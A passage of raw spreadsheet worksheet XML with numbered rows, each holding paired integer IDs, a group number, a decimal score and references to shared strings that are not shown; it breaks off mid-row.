    <row r="5094" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5094" s="1">
        <v>5092</v>
      </c>
      <c r="B5094">
        <v>2110</v>
      </c>
      <c r="C5094">
        <v>2110</v>
      </c>
      <c r="D5094">
        <v>2</v>
      </c>
      <c r="E5094">
        <v>0.99839997291564941</v>
      </c>
      <c r="F5094" t="s">
        <v>5592</v>
      </c>
      <c r="G5094" t="s">
        <v>10070</v>
      </c>
      <c r="H5094" t="s">
        <v>10071</v>
      </c>
    </row>
    <row r="5095" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5095" s="1">
        <v>5093</v>
      </c>
      <c r="B5095">
        <v>6987</v>
      </c>
      <c r="C5095">
        <v>6987</v>
      </c>
      <c r="D5095">
        <v>2</v>
      </c>
      <c r="E5095">
        <v>0.60659998655319214</v>
      </c>
      <c r="F5095" t="s">
        <v>5592</v>
      </c>
      <c r="G5095" t="s">
        <v>10072</v>
      </c>
      <c r="H5095" t="s">
        <v>10073</v>
      </c>
    </row>
    <row r="5096" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5096" s="1">
        <v>5094</v>
      </c>
      <c r="B5096">
        <v>2620</v>
      </c>
      <c r="C5096">
        <v>2620</v>
      </c>
      <c r="D5096">
        <v>2</v>
      </c>
      <c r="E5096">
        <v>0.69389998912811279</v>
      </c>
      <c r="F5096" t="s">
        <v>5592</v>
      </c>
      <c r="G5096" t="s">
        <v>10074</v>
      </c>
      <c r="H5096" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="5097" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5097" s="1">
        <v>5095</v>
      </c>
      <c r="B5097">
        <v>2615</v>
      </c>
      <c r="C5097">
        <v>2615</v>
      </c>
      <c r="D5097">
        <v>2</v>
      </c>
      <c r="E5097">
        <v>0.62919998168945313</v>
      </c>
      <c r="F5097" t="s">
        <v>5592</v>
      </c>
      <c r="G5097" t="s">
        <v>10076</v>
      </c>
      <c r="H5097" t="s">
        <v>10077</v>
      </c>
    </row>
    <row r="5098" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5098" s="1">
        <v>5096</v>
      </c>
      <c r="B5098">
        <v>2612</v>
      </c>
      <c r="C5098">
        <v>2612</v>
      </c>
      <c r="D5098">
        <v>2</v>
      </c>
      <c r="E5098">
        <v>0.55000001192092896</v>
      </c>
      <c r="F5098" t="s">
        <v>5592</v>
      </c>
      <c r="G5098" t="s">
        <v>10078</v>
      </c>
      <c r="H5098" t="s">
        <v>10079</v>
      </c>
    </row>
    <row r="5099" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5099" s="1">
        <v>5097</v>
      </c>
      <c r="B5099">
        <v>2608</v>
      </c>
      <c r="C5099">
        <v>2608</v>
      </c>
      <c r="D5099">
        <v>2</v>
      </c>
      <c r="E5099">
        <v>0.97710001468658447</v>
      </c>
      <c r="F5099" t="s">
        <v>5592</v>
      </c>
      <c r="G5099" t="s">
        <v>10080</v>
      </c>
      <c r="H5099" t="s">
        <v>9651</v>
      </c>
    </row>
    <row r="5100" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5100" s="1">
        <v>5098</v>
      </c>
      <c r="B5100">
        <v>2607</v>
      </c>
      <c r="C5100">
        <v>2607</v>
      </c>
      <c r="D5100">
        <v>2</v>
      </c>
      <c r="E5100">
        <v>0.99500000476837158</v>
      </c>
      <c r="F5100" t="s">
        <v>5592</v>
      </c>
      <c r="G5100" t="s">
        <v>10081</v>
      </c>
      <c r="H5100" t="s">
        <v>10082</v>
      </c>
    </row>
    <row r="5101" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5101" s="1">
        <v>5099</v>
      </c>
      <c r="B5101">
        <v>6985</v>
      </c>
      <c r="C5101">
        <v>6985</v>
      </c>
      <c r="D5101">
        <v>2</v>
      </c>
      <c r="E5101">
        <v>0.71060001850128174</v>
      </c>
      <c r="F5101" t="s">
        <v>5592</v>
      </c>
      <c r="G5101" t="s">
        <v>10083</v>
      </c>
      <c r="H5101" t="s">
        <v>10084</v>
      </c>
    </row>
    <row r="5102" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5102" s="1">
        <v>5100</v>
      </c>
      <c r="B5102">
        <v>2116</v>
      </c>
      <c r="C5102">
        <v>2116</v>
      </c>
      <c r="D5102">
        <v>2</v>
      </c>
      <c r="E5102">
        <v>0.80699998140335083</v>
      </c>
      <c r="F5102" t="s">
        <v>5592</v>
      </c>
      <c r="G5102" t="s">
        <v>10085</v>
      </c>
      <c r="H5102" t="s">
        <v>10086</v>
      </c>
    </row>
    <row r="5103" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5103" s="1">
        <v>5101</v>
      </c>
      <c r="B5103">
        <v>2121</v>
      </c>
      <c r="C5103">
        <v>2121</v>
      </c>
      <c r="D5103">
        <v>2</v>
      </c>
      <c r="E5103">
        <v>0.99800002574920654</v>
      </c>
      <c r="F5103" t="s">
        <v>5592</v>
      </c>
      <c r="G5103" t="s">
        <v>10087</v>
      </c>
      <c r="H5103" t="s">
        <v>10088</v>
      </c>
    </row>
    <row r="5104" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5104" s="1">
        <v>5102</v>
      </c>
      <c r="B5104">
        <v>6983</v>
      </c>
      <c r="C5104">
        <v>6983</v>
      </c>
      <c r="D5104">
        <v>2</v>
      </c>
      <c r="E5104">
        <v>0.73360002040863037</v>
      </c>
      <c r="F5104" t="s">
        <v>5592</v>
      </c>
      <c r="G5104" t="s">
        <v>10089</v>
      </c>
      <c r="H5104" t="s">
        <v>10090</v>
      </c>
    </row>
    <row r="5105" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5105" s="1">
        <v>5103</v>
      </c>
      <c r="B5105">
        <v>6992</v>
      </c>
      <c r="C5105">
        <v>6992</v>
      </c>
      <c r="D5105">
        <v>2</v>
      </c>
      <c r="E5105">
        <v>0.8968999981880188</v>
      </c>
      <c r="F5105" t="s">
        <v>5592</v>
      </c>
      <c r="G5105" t="s">
        <v>10091</v>
      </c>
      <c r="H5105" t="s">
        <v>10092</v>
      </c>
    </row>
    <row r="5106" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5106" s="1">
        <v>5104</v>
      </c>
      <c r="B5106">
        <v>6788</v>
      </c>
      <c r="C5106">
        <v>6788</v>
      </c>
      <c r="D5106">
        <v>2</v>
      </c>
      <c r="E5106">
        <v>0.64980000257492065</v>
      </c>
      <c r="F5106" t="s">
        <v>5592</v>
      </c>
      <c r="G5106" t="s">
        <v>10093</v>
      </c>
      <c r="H5106" t="s">
        <v>10094</v>
      </c>
    </row>
    <row r="5107" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5107" s="1">
        <v>5105</v>
      </c>
      <c r="B5107">
        <v>6897</v>
      </c>
      <c r="C5107">
        <v>6897</v>
      </c>
      <c r="D5107">
        <v>2</v>
      </c>
      <c r="E5107">
        <v>0.73290002346038818</v>
      </c>
      <c r="F5107" t="s">
        <v>5592</v>
      </c>
      <c r="G5107" t="s">
        <v>10095</v>
      </c>
      <c r="H5107" t="s">
        <v>10096</v>
      </c>
    </row>
    <row r="5108" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5108" s="1">
        <v>5106</v>
      </c>
      <c r="B5108">
        <v>6793</v>
      </c>
      <c r="C5108">
        <v>6793</v>
      </c>
      <c r="D5108">
        <v>2</v>
      </c>
      <c r="E5108">
        <v>0.75779998302459717</v>
      </c>
      <c r="F5108" t="s">
        <v>5592</v>
      </c>
      <c r="G5108" t="s">
        <v>10097</v>
      </c>
      <c r="H5108" t="s">
        <v>10098</v>
      </c>
    </row>
    <row r="5109" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5109" s="1">
        <v>5107</v>
      </c>
      <c r="B5109">
        <v>2541</v>
      </c>
      <c r="C5109">
        <v>2541</v>
      </c>
      <c r="D5109">
        <v>2</v>
      </c>
      <c r="E5109">
        <v>0.55419999361038208</v>
      </c>
      <c r="F5109" t="s">
        <v>5592</v>
      </c>
      <c r="G5109" t="s">
        <v>10099</v>
      </c>
      <c r="H5109" t="s">
        <v>10100</v>
      </c>
    </row>
    <row r="5110" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5110" s="1">
        <v>5108</v>
      </c>
      <c r="B5110">
        <v>2528</v>
      </c>
      <c r="C5110">
        <v>2528</v>
      </c>
      <c r="D5110">
        <v>2</v>
      </c>
      <c r="E5110">
        <v>0.98839998245239258</v>
      </c>
      <c r="F5110" t="s">
        <v>5592</v>
      </c>
      <c r="G5110" t="s">
        <v>10101</v>
      </c>
      <c r="H5110" t="s">
        <v>10102</v>
      </c>
    </row>
    <row r="5111" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5111" s="1">
        <v>5109</v>
      </c>
      <c r="B5111">
        <v>2535</v>
      </c>
      <c r="C5111">
        <v>2535</v>
      </c>
      <c r="D5111">
        <v>2</v>
      </c>
      <c r="E5111">
        <v>0.6086999773979187</v>
      </c>
      <c r="F5111" t="s">
        <v>5592</v>
      </c>
      <c r="G5111" t="s">
        <v>10103</v>
      </c>
      <c r="H5111" t="s">
        <v>10104</v>
      </c>
    </row>
    <row r="5112" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5112" s="1">
        <v>5110</v>
      </c>
      <c r="B5112">
        <v>2529</v>
      </c>
      <c r="C5112">
        <v>2529</v>
      </c>
      <c r="D5112">
        <v>2</v>
      </c>
      <c r="E5112">
        <v>0.71789997816085815</v>
      </c>
      <c r="F5112" t="s">
        <v>5592</v>
      </c>
      <c r="G5112" t="s">
        <v>10105</v>
      </c>
      <c r="H5112" t="s">
        <v>10106</v>
      </c>
    </row>
    <row r="5113" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5113" s="1">
        <v>5111</v>
      </c>
      <c r="B5113">
        <v>6794</v>
      </c>
      <c r="C5113">
        <v>6794</v>
      </c>
      <c r="D5113">
        <v>2</v>
      </c>
      <c r="E5113">
        <v>0.99479997158050537</v>
      </c>
      <c r="F5113" t="s">
        <v>5592</v>
      </c>
      <c r="G5113" t="s">
        <v>10107</v>
      </c>
      <c r="H5113" t="s">
        <v>10108</v>
      </c>
    </row>
    <row r="5114" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5114" s="1">
        <v>5112</v>
      </c>
      <c r="B5114">
        <v>6789</v>
      </c>
      <c r="C5114">
        <v>6789</v>
      </c>
      <c r="D5114">
        <v>2</v>
      </c>
      <c r="E5114">
        <v>0.88029998540878296</v>
      </c>
      <c r="F5114" t="s">
        <v>5592</v>
      </c>
      <c r="G5114" t="s">
        <v>10109</v>
      </c>
      <c r="H5114" t="s">
        <v>10110</v>
      </c>
    </row>
    <row r="5115" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5115" s="1">
        <v>5113</v>
      </c>
      <c r="B5115">
        <v>6790</v>
      </c>
      <c r="C5115">
        <v>6790</v>
      </c>
      <c r="D5115">
        <v>2</v>
      </c>
      <c r="E5115">
        <v>0.43810001015663153</v>
      </c>
      <c r="F5115" t="s">
        <v>5592</v>
      </c>
      <c r="G5115" t="s">
        <v>10111</v>
      </c>
      <c r="H5115" t="s">
        <v>10112</v>
      </c>
    </row>
    <row r="5116" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5116" s="1">
        <v>5114</v>
      </c>
      <c r="B5116">
        <v>6791</v>
      </c>
      <c r="C5116">
        <v>6791</v>
      </c>
      <c r="D5116">
        <v>2</v>
      </c>
      <c r="E5116">
        <v>0.68529999256134033</v>
      </c>
      <c r="F5116" t="s">
        <v>5592</v>
      </c>
      <c r="G5116" t="s">
        <v>10113</v>
      </c>
      <c r="H5116" t="s">
        <v>10114</v>
      </c>
    </row>
    <row r="5117" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5117" s="1">
        <v>5115</v>
      </c>
      <c r="B5117">
        <v>2537</v>
      </c>
      <c r="C5117">
        <v>2537</v>
      </c>
      <c r="D5117">
        <v>2</v>
      </c>
      <c r="E5117">
        <v>0.69179999828338623</v>
      </c>
      <c r="F5117" t="s">
        <v>5592</v>
      </c>
      <c r="G5117" t="s">
        <v>10115</v>
      </c>
      <c r="H5117" t="s">
        <v>10116</v>
      </c>
    </row>
    <row r="5118" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5118" s="1">
        <v>5116</v>
      </c>
      <c r="B5118">
        <v>6967</v>
      </c>
      <c r="C5118">
        <v>6967</v>
      </c>
      <c r="D5118">
        <v>2</v>
      </c>
      <c r="E5118">
        <v>0.83920001983642578</v>
      </c>
      <c r="F5118" t="s">
        <v>5592</v>
      </c>
      <c r="G5118" t="s">
        <v>10117</v>
      </c>
      <c r="H5118" t="s">
        <v>7907</v>
      </c>
    </row>
    <row r="5119" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5119" s="1">
        <v>5117</v>
      </c>
      <c r="B5119">
        <v>2540</v>
      </c>
      <c r="C5119">
        <v>2540</v>
      </c>
      <c r="D5119">
        <v>2</v>
      </c>
      <c r="E5119">
        <v>0.4302000105381012</v>
      </c>
      <c r="F5119" t="s">
        <v>5592</v>
      </c>
      <c r="G5119" t="s">
        <v>10118</v>
      </c>
      <c r="H5119" t="s">
        <v>10119</v>
      </c>
    </row>
    <row r="5120" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5120" s="1">
        <v>5118</v>
      </c>
      <c r="B5120">
        <v>5941</v>
      </c>
      <c r="C5120">
        <v>5941</v>
      </c>
      <c r="D5120">
        <v>3</v>
      </c>
      <c r="E5120">
        <v>0.40450000762939448</v>
      </c>
      <c r="F5120" t="s">
        <v>10120</v>
      </c>
      <c r="G5120" t="s">
        <v>10121</v>
      </c>
      <c r="H5120" t="s">
        <v>10122</v>
      </c>
    </row>
    <row r="5121" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5121" s="1">
        <v>5119</v>
      </c>
      <c r="B5121">
        <v>6002</v>
      </c>
      <c r="C5121">
        <v>6002</v>
      </c>
      <c r="D5121">
        <v>3</v>
      </c>
      <c r="E5121">
        <v>0.64620000123977661</v>
      </c>
      <c r="F5121" t="s">
        <v>10120</v>
      </c>
      <c r="G5121" t="s">
        <v>10123</v>
      </c>
      <c r="H5121" t="s">
        <v>10124</v>
      </c>
    </row>
    <row r="5122" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5122" s="1">
        <v>5120</v>
      </c>
      <c r="B5122">
        <v>6004</v>
      </c>
      <c r="C5122">
        <v>6004</v>
      </c>
      <c r="D5122">
        <v>3</v>
      </c>
      <c r="E5122">
        <v>0.90939998626708984</v>
      </c>
      <c r="F5122" t="s">
        <v>10120</v>
      </c>
      <c r="G5122" t="s">
        <v>10125</v>
      </c>
      <c r="H5122" t="s">
        <v>10126</v>
      </c>
    </row>
    <row r="5123" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5123" s="1">
        <v>5121</v>
      </c>
      <c r="B5123">
        <v>7885</v>
      </c>
      <c r="C5123">
        <v>7885</v>
      </c>
      <c r="D5123">
        <v>3</v>
      </c>
      <c r="E5123">
        <v>0.97180002927780151</v>
      </c>
      <c r="F5123" t="s">
        <v>10120</v>
      </c>
      <c r="G5123" t="s">
        <v>10127</v>
      </c>
      <c r="H5123" t="s">
        <v>10128</v>
      </c>
    </row>
    <row r="5124" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5124" s="1">
        <v>5122</v>
      </c>
      <c r="B5124">
        <v>6910</v>
      </c>
      <c r="C5124">
        <v>6910</v>
      </c>
      <c r="D5124">
        <v>3</v>
      </c>
      <c r="E5124">
        <v>0.65100002288818359</v>
      </c>
      <c r="F5124" t="s">
        <v>10120</v>
      </c>
      <c r="G5124" t="s">
        <v>10129</v>
      </c>
      <c r="H5124" t="s">
        <v>10130</v>
      </c>
    </row>
    <row r="5125" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5125" s="1">
        <v>5123</v>
      </c>
      <c r="B5125">
        <v>6354</v>
      </c>
      <c r="C5125">
        <v>6354</v>
      </c>
      <c r="D5125">
        <v>3</v>
      </c>
      <c r="E5125">
        <v>0.85110002756118774</v>
      </c>
      <c r="F5125" t="s">
        <v>10120</v>
      </c>
      <c r="G5125" t="s">
        <v>10131</v>
      </c>
      <c r="H5125" t="s">
        <v>10132</v>
      </c>
    </row>
    <row r="5126" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5126" s="1">
        <v>5124</v>
      </c>
      <c r="B5126">
        <v>5688</v>
      </c>
      <c r="C5126">
        <v>5688</v>
      </c>
      <c r="D5126">
        <v>3</v>
      </c>
      <c r="E5126">
        <v>0.78229999542236328</v>
      </c>
      <c r="F5126" t="s">
        <v>10120</v>
      </c>
      <c r="G5126" t="s">
        <v>10133</v>
      </c>
      <c r="H5126" t="s">
        <v>10134</v>
      </c>
    </row>
    <row r="5127" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5127" s="1">
        <v>5125</v>
      </c>
      <c r="B5127">
        <v>6999</v>
      </c>
      <c r="C5127">
        <v>6999</v>
      </c>
      <c r="D5127">
        <v>3</v>
      </c>
      <c r="E5127">
        <v>0.95399999618530273</v>
      </c>
      <c r="F5127" t="s">
        <v>10120</v>
      </c>
      <c r="G5127" t="s">
        <v>10135</v>
      </c>
      <c r="H5127" t="s">
        <v>10136</v>
      </c>
    </row>
    <row r="5128" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5128" s="1">
        <v>5126</v>
      </c>
      <c r="B5128">
        <v>6423</v>
      </c>
      <c r="C5128">
        <v>6423</v>
      </c>
      <c r="D5128">
        <v>3</v>
      </c>
      <c r="E5128">
        <v>0.53030002117156982</v>
      </c>
      <c r="F5128" t="s">
        <v>10120</v>
      </c>
      <c r="G5128" t="s">
        <v>10137</v>
      </c>
      <c r="H5128" t="s">
        <v>10138</v>
      </c>
    </row>
    <row r="5129" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5129" s="1">
        <v>5127</v>
      </c>
      <c r="B5129">
        <v>6495</v>
      </c>
      <c r="C5129">
        <v>6495</v>
      </c>
      <c r="D5129">
        <v>3</v>
      </c>
      <c r="E5129">
        <v>0.69929999113082886</v>
      </c>
      <c r="F5129" t="s">
        <v>10120</v>
      </c>
      <c r="G5129" t="s">
        <v>10139</v>
      </c>
      <c r="H5129" t="s">
        <v>10140</v>
      </c>
    </row>
    <row r="5130" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5130" s="1">
        <v>5128</v>
      </c>
      <c r="B5130">
        <v>6960</v>
      </c>
      <c r="C5130">
        <v>6960</v>
      </c>
      <c r="D5130">
        <v>3</v>
      </c>
      <c r="E5130">
        <v>0.80440002679824829</v>
      </c>
      <c r="F5130" t="s">
        <v>10120</v>
      </c>
      <c r="G5130" t="s">
        <v>10141</v>
      </c>
      <c r="H5130" t="s">
        <v>10142</v>
      </c>
    </row>
    <row r="5131" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5131" s="1">
        <v>5129</v>
      </c>
      <c r="B5131">
        <v>7889</v>
      </c>
      <c r="C5131">
        <v>7889</v>
      </c>
      <c r="D5131">
        <v>3</v>
      </c>
      <c r="E5131">
        <v>0.52649998664855957</v>
      </c>
      <c r="F5131" t="s">
        <v>10120</v>
      </c>
      <c r="G5131" t="s">
        <v>10143</v>
      </c>
      <c r="H5131" t="s">
        <v>10144</v>
      </c>
    </row>
    <row r="5132" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5132" s="1">
        <v>5130</v>
      </c>
      <c r="B5132">
        <v>7891</v>
      </c>
      <c r="C5132">
        <v>7891</v>
      </c>
      <c r="D5132">
        <v>3</v>
      </c>
      <c r="E5132">
        <v>0.65429997444152832</v>
      </c>
      <c r="F5132" t="s">
        <v>10120</v>
      </c>
      <c r="G5132" t="s">
        <v>10145</v>
      </c>
      <c r="H5132" t="s">
        <v>10146</v>
      </c>
    </row>
    <row r="5133" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5133" s="1">
        <v>5131</v>
      </c>
      <c r="B5133">
        <v>6496</v>
      </c>
      <c r="C5133">
        <v>6496</v>
      </c>
      <c r="D5133">
        <v>3</v>
      </c>
      <c r="E5133">
        <v>0.99430000782012939</v>
      </c>
      <c r="F5133" t="s">
        <v>10120</v>
      </c>
      <c r="G5133" t="s">
        <v>10147</v>
      </c>
      <c r="H5133" t="s">
        <v>10148</v>
      </c>
    </row>
    <row r="5134" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5134" s="1">
        <v>5132</v>
      </c>
      <c r="B5134">
        <v>6498</v>
      </c>
      <c r="C5134">
        <v>6498</v>
      </c>
      <c r="D5134">
        <v>3</v>
      </c>
      <c r="E5134">
        <v>0.93910002708435059</v>
      </c>
      <c r="F5134" t="s">
        <v>10120</v>
      </c>
      <c r="G5134" t="s">
        <v>10149</v>
      </c>
      <c r="H5134" t="s">
        <v>10150</v>
      </c>
    </row>
    <row r="5135" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5135" s="1">
        <v>5133</v>
      </c>
      <c r="B5135">
        <v>6993</v>
      </c>
      <c r="C5135">
        <v>6993</v>
      </c>
      <c r="D5135">
        <v>3</v>
      </c>
      <c r="E5135">
        <v>0.62730002403259277</v>
      </c>
      <c r="F5135" t="s">
        <v>10120</v>
      </c>
      <c r="G5135" t="s">
        <v>10151</v>
      </c>
      <c r="H5135" t="s">
        <v>10152</v>
      </c>
    </row>
    <row r="5136" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5136" s="1">
        <v>5134</v>
      </c>
      <c r="B5136">
        <v>6422</v>
      </c>
      <c r="C5136">
        <v>6422</v>
      </c>
      <c r="D5136">
        <v>3</v>
      </c>
      <c r="E5136">
        <v>0.69620001316070557</v>
      </c>
      <c r="F5136" t="s">
        <v>10120</v>
      </c>
      <c r="G5136" t="s">
        <v>10153</v>
      </c>
      <c r="H5136" t="s">
        <v>10154</v>
      </c>
    </row>
    <row r="5137" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5137" s="1">
        <v>5135</v>
      </c>
      <c r="B5137">
        <v>5968</v>
      </c>
      <c r="C5137">
        <v>5968</v>
      </c>
      <c r="D5137">
        <v>3</v>
      </c>
      <c r="E5137">
        <v>0.99659997224807739</v>
      </c>
      <c r="F5137" t="s">
        <v>10120</v>
      </c>
      <c r="G5137" t="s">
        <v>10155</v>
      </c>
      <c r="H5137" t="s">
        <v>10156</v>
      </c>
    </row>
    <row r="5138" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5138" s="1">
        <v>5136</v>
      </c>
      <c r="B5138">
        <v>6968</v>
      </c>
      <c r="C5138">
        <v>6968</v>
      </c>
      <c r="D5138">
        <v>3</v>
      </c>
      <c r="E5138">
        <v>0.99940001964569092</v>
      </c>
      <c r="F5138" t="s">
        <v>10120</v>
      </c>
      <c r="G5138" t="s">
        <v>10157</v>
      </c>
      <c r="H5138" t="s">
        <v>10158</v>
      </c>
    </row>
    <row r="5139" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5139" s="1">
        <v>5137</v>
      </c>
      <c r="B5139">
        <v>6303</v>
      </c>
      <c r="C5139">
        <v>6303</v>
      </c>
      <c r="D5139">
        <v>3</v>
      </c>
      <c r="E5139">
        <v>0.54159998893737793</v>
      </c>
      <c r="F5139" t="s">
        <v>10120</v>
      </c>
      <c r="G5139" t="s">
        <v>10159</v>
      </c>
      <c r="H5139" t="s">
        <v>10160</v>
      </c>
    </row>
    <row r="5140" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5140" s="1">
        <v>5138</v>
      </c>
      <c r="B5140">
        <v>7879</v>
      </c>
      <c r="C5140">
        <v>7879</v>
      </c>
      <c r="D5140">
        <v>3</v>
      </c>
      <c r="E5140">
        <v>0.5975000262260437</v>
      </c>
      <c r="F5140" t="s">
        <v>10120</v>
      </c>
      <c r="G5140" t="s">
        <v>10161</v>
      </c>
      <c r="H5140" t="s">
        <v>10162</v>
      </c>
    </row>
    <row r="5141" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5141" s="1">
        <v>5139</v>
      </c>
      <c r="B5141">
        <v>6392</v>
      </c>
      <c r="C5141">
        <v>6392</v>
      </c>
      <c r="D5141">
        <v>3</v>
      </c>
      <c r="E5141">
        <v>0.82099997997283936</v>
      </c>
      <c r="F5141" t="s">
        <v>10120</v>
      </c>
      <c r="G5141" t="s">
        <v>10163</v>
      </c>
      <c r="H5141" t="s">
        <v>10164</v>
      </c>
    </row>
    <row r="5142" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5142" s="1">
        <v>5140</v>
      </c>
      <c r="B5142">
        <v>5681</v>
      </c>
      <c r="C5142">
        <v>5681</v>
      </c>
      <c r="D5142">
        <v>3</v>
      </c>
      <c r="E5142">
        <v>0.92259997129440308</v>
      </c>
      <c r="F5142" t="s">
        <v>10120</v>
      </c>
      <c r="G5142" t="s">
        <v>10165</v>
      </c>
      <c r="H5142" t="s">
        <v>10166</v>
      </c>
    </row>
    <row r="5143" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5143" s="1">
        <v>5141</v>
      </c>
      <c r="B5143">
        <v>6922</v>
      </c>
      <c r="C5143">
        <v>6922</v>
      </c>
      <c r="D5143">
        <v>3</v>
      </c>
      <c r="E5143">
        <v>0.97649997472763062</v>
      </c>
      <c r="F5143" t="s">
        <v>10120</v>
      </c>
      <c r="G5143" t="s">
        <v>10167</v>
      </c>
      <c r="H5143" t="s">
        <v>10168</v>
      </c>
    </row>
    <row r="5144" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5144" s="1">
        <v>5142</v>
      </c>
      <c r="B5144">
        <v>5947</v>
      </c>
      <c r="C5144">
        <v>5947</v>
      </c>
      <c r="D5144">
        <v>3</v>
      </c>
      <c r="E5144">
        <v>0.62379997968673706</v>
      </c>
      <c r="F5144" t="s">
        <v>10120</v>
      </c>
      <c r="G5144" t="s">
        <v>10169</v>
      </c>
      <c r="H5144" t="s">
        <v>10170</v>
      </c>
    </row>
    <row r="5145" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5145" s="1">
        <v>5143</v>
      </c>
      <c r="B5145">
        <v>6055</v>
      </c>
      <c r="C5145">
        <v>6055</v>
      </c>
      <c r="D5145">
        <v>3</v>
      </c>
      <c r="E5145">
        <v>0.72890001535415649</v>
      </c>
      <c r="F5145" t="s">
        <v>10120</v>
      </c>
      <c r="G5145" t="s">
        <v>10171</v>
      </c>
      <c r="H5145" t="s">
        <v>10172</v>
      </c>
    </row>
    <row r="5146" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5146" s="1">
        <v>5144</v>
      </c>
      <c r="B5146">
        <v>5974</v>
      </c>
      <c r="C5146">
        <v>5974</v>
      </c>
      <c r="D5146">
        <v>3</v>
      </c>
      <c r="E5146">
        <v>0.66329997777938843</v>
      </c>
      <c r="F5146" t="s">
        <v>10120</v>
      </c>
      <c r="G5146" t="s">
        <v>10173</v>
      </c>
      <c r="H5146" t="s">
        <v>10174</v>
      </c>
    </row>
    <row r="5147" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5147" s="1">
        <v>5145</v>
      </c>
      <c r="B5147">
        <v>7736</v>
      </c>
      <c r="C5147">
        <v>7736</v>
      </c>
      <c r="D5147">
        <v>3</v>
      </c>
      <c r="E5147">
        <v>0.70010000467300415</v>
      </c>
      <c r="F5147" t="s">
        <v>10120</v>
      </c>
      <c r="G5147" t="s">
        <v>10175</v>
      </c>
      <c r="H5147" t="s">
        <v>10176</v>
      </c>
    </row>
    <row r="5148" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5148" s="1">
        <v>5146</v>
      </c>
      <c r="B5148">
        <v>7735</v>
      </c>
      <c r="C5148">
        <v>7735</v>
      </c>
      <c r="D5148">
        <v>3</v>
      </c>
      <c r="E5148">
        <v>0.883899986743927</v>
      </c>
      <c r="F5148" t="s">
        <v>10120</v>
      </c>
      <c r="G5148" t="s">
        <v>10177</v>
      </c>
      <c r="H5148" t="s">
        <v>10178</v>
      </c>
    </row>
    <row r="5149" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5149" s="1">
        <v>5147</v>
      </c>
      <c r="B5149">
        <v>7734</v>
      </c>
      <c r="C5149">
        <v>7734</v>
      </c>
      <c r="D5149">
        <v>3</v>
      </c>
      <c r="E5149">
        <v>0.71880000829696655</v>
      </c>
      <c r="F5149" t="s">
        <v>10120</v>
      </c>
      <c r="G5149" t="s">
        <v>10179</v>
      </c>
      <c r="H5149" t="s">
        <v>10180</v>
      </c>
    </row>
    <row r="5150" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5150" s="1">
        <v>5148</v>
      </c>
      <c r="B5150">
        <v>7733</v>
      </c>
      <c r="C5150">
        <v>7733</v>
      </c>
      <c r="D5150">
        <v>3</v>
      </c>
      <c r="E5150">
        <v>0.60839998722076416</v>
      </c>
      <c r="F5150" t="s">
        <v>10120</v>
      </c>
      <c r="G5150" t="s">
        <v>10181</v>
      </c>
      <c r="H5150" t="s">
        <v>10182</v>
      </c>
    </row>
    <row r="5151" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5151" s="1">
        <v>5149</v>
      </c>
      <c r="B5151">
        <v>7055</v>
      </c>
      <c r="C5151">
        <v>7055</v>
      </c>
      <c r="D5151">
        <v>3</v>
      </c>
      <c r="E5151">
        <v>0.71850001811981201</v>
      </c>
      <c r="F5151" t="s">
        <v>10120</v>
      </c>
      <c r="G5151" t="s">
        <v>10183</v>
      </c>
      <c r="H5151" t="s">
        <v>10184</v>
      </c>
    </row>
    <row r="5152" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5152" s="1">
        <v>5150</v>
      </c>
      <c r="B5152">
        <v>6419</v>
      </c>
      <c r="C5152">
